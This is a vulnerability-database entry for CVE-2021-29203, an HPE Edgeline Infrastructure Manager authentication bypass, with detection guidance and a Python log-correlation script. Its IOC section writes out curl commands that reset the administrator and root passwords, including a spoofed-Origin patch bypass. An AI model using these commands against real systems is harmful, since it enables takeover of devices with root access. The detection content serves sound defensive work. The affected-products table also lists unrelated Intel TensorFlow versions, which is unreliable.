cbcvebase.
CVE-2021-29203
published 2021-05-06

Priority: P1 · 91 · critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 68.29% (99.2th percentile)

A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.

Affected

4 ranges
Vendor   Product                           Version range       Fixed in
hp       edgeline_infrastructure_manager   < 1.22              1.22
intel    optimization_for_tensorflow       >= 0 < 2.6.4        2.6.4
intel    optimization_for_tensorflow       >= 2.7.0 < 2.7.2    2.7.2
intel    optimization_for_tensorflow       >= 2.8.0 < 2.8.1    2.8.1

Detection & IOCs (extracted from sources)

url: /redfish/v1/SessionService/ResetPassword/1
url: /redfish/v1/SessionService/Sessions
url: /redfish/v1/AccountService/Accounts/1
command: curl -k --tlsv1.2 -H 'Content-Type: application/json' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/SessionService/ResetPassword/1
command: curl -ki --tlsv1.2 -H 'content-type: application/json' -d '{"UserName":"Administrator","Password":"attacker"}' https:///redfish/v1/SessionService/Sessions
command: curl -ki --tlsv1.2 -H 'content-type: application/json' -H 'x-auth-token: eda6c27504c54cf68e1d005742c1ef8c573e5e60' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/AccountService/Accounts/1
command: curl -k --tlsv1.2 -H 'Content-Type: application/json' -H 'Origin: https://127.0.0.1' -d '{"Password":"attacker"}' -X PATCH https:///redfish/v1/SessionService/ResetPassword/1
sigma: PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
  • Detect unauthenticated PATCH requests to /redfish/v1/SessionService/ResetPassword/1 — this endpoint should only be accessible from the local console (127.0.0.1) and any remote PATCH to it indicates exploitation of the auth bypass.
  • Detect HTTP requests to /redfish/v1/SessionService/ResetPassword/1 that include a spoofed 'Origin: https://127.0.0.1' header from a non-loopback remote IP — this is the v1.22 patch bypass technique.
  • Alert on POST to /redfish/v1/SessionService/Sessions with body containing 'UserName':'Administrator' immediately following a PATCH to /redfish/v1/SessionService/ResetPassword/1 from the same source IP — indicates full attack chain execution.
  • Monitor for PATCH requests to /redfish/v1/AccountService/Accounts/1 with an X-Auth-Token header — this step resets both the Administrator webapp password and the OS root account password, enabling SSH root access.
  • Look for HTTP 201 responses from /redfish/v1/SessionService/Sessions containing both 'X-Auth-Token' and 'PasswordReset' headers — the Nuclei template uses these as confirmation of successful authentication after the bypass.
  • Detect response body containing 'Base.1.0.Created' with HTTP 201 status from /redfish/v1/SessionService/Sessions — this confirms a successful login session was created post-password-reset.
  • The v1.22 patch is incomplete — it only checks the Origin header value ('https://127.0.0.1') to restrict password reset to console users, but an attacker can trivially spoof this header remotely. Full mitigation requires upgrading to version 1.23.
  • The vulnerable endpoint /redfish/v1/SessionService/ResetPassword/1 is decorated with AllowAll permission class, meaning no authentication is enforced at the framework level — network-layer blocking of this endpoint is an interim mitigation.
  • Exploitation of /redfish/v1/AccountService/Accounts/1 resets BOTH the web application Administrator account AND the OS root account simultaneously, meaning a successful attack grants SSH root access to the underlying host.
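
The request patterns in the bullets above, expressed as a correlation check over web access logs. This is an added example, not part of the original page or any vendor tooling; the JSON-lines log schema (ts, src, method, path, origin, status), the 300-second correlation window, and the sample events are assumptions constructed for illustration.

```python
import ipaddress
import json

RESET = "/redfish/v1/SessionService/ResetPassword/1"
SESSIONS = "/redfish/v1/SessionService/Sessions"
ACCOUNT = "/redfish/v1/AccountService/Accounts/1"
CHAIN_WINDOW = 300  # seconds; assumed correlation window, tune locally

# Constructed sample events (assumed JSON-lines proxy log schema, documentation IPs).
SAMPLE_LOG = """\
{"ts": 100, "src": "127.0.0.1", "method": "PATCH", "path": "/redfish/v1/SessionService/ResetPassword/1", "origin": "https://127.0.0.1", "status": 200}
{"ts": 200, "src": "198.51.100.7", "method": "PATCH", "path": "/redfish/v1/SessionService/ResetPassword/1/", "origin": "https://127.0.0.1", "status": 200}
{"ts": 205, "src": "198.51.100.7", "method": "POST", "path": "/redfish/v1/SessionService/Sessions", "origin": null, "status": 201}
{"ts": 210, "src": "198.51.100.7", "method": "PATCH", "path": "/redfish/v1/AccountService/Accounts/1", "origin": null, "status": 200}
{"ts": 900, "src": "203.0.113.9", "method": "POST", "path": "/redfish/v1/SessionService/Sessions", "origin": null, "status": 201}
"""

def detect(log_text):
    """Return (ts, src, rule) findings for the patterns in the bullets above."""
    findings, last_reset = [], {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        src, ts = ev["src"], ev["ts"]
        # Normalise query string and trailing slash so both URL forms match.
        path = ev["path"].split("?")[0].rstrip("/")
        remote = not ipaddress.ip_address(src).is_loopback
        if ev["method"] == "PATCH" and path == RESET and remote:
            # A loopback Origin sent from a non-loopback peer is the header spoof.
            spoofed = (ev.get("origin") or "").rstrip("/") == "https://127.0.0.1"
            rule = "remote_reset_spoofed_origin" if spoofed else "remote_reset"
            findings.append((ts, src, rule))
            last_reset[src] = ts
        elif src in last_reset and ts - last_reset[src] <= CHAIN_WINDOW:
            # Follow-on requests from the same source shortly after a remote reset.
            if ev["method"] == "POST" and path == SESSIONS and ev["status"] == 201:
                findings.append((ts, src, "session_created_after_reset"))
            elif ev["method"] == "PATCH" and path == ACCOUNT:
                findings.append((ts, src, "account_patch_after_reset"))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The source address must be the real peer address seen by the listener or a trusted proxy, since the Origin header itself is client-controlled.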

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      10.0    CRITICAL   AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck             9.8     CRITICAL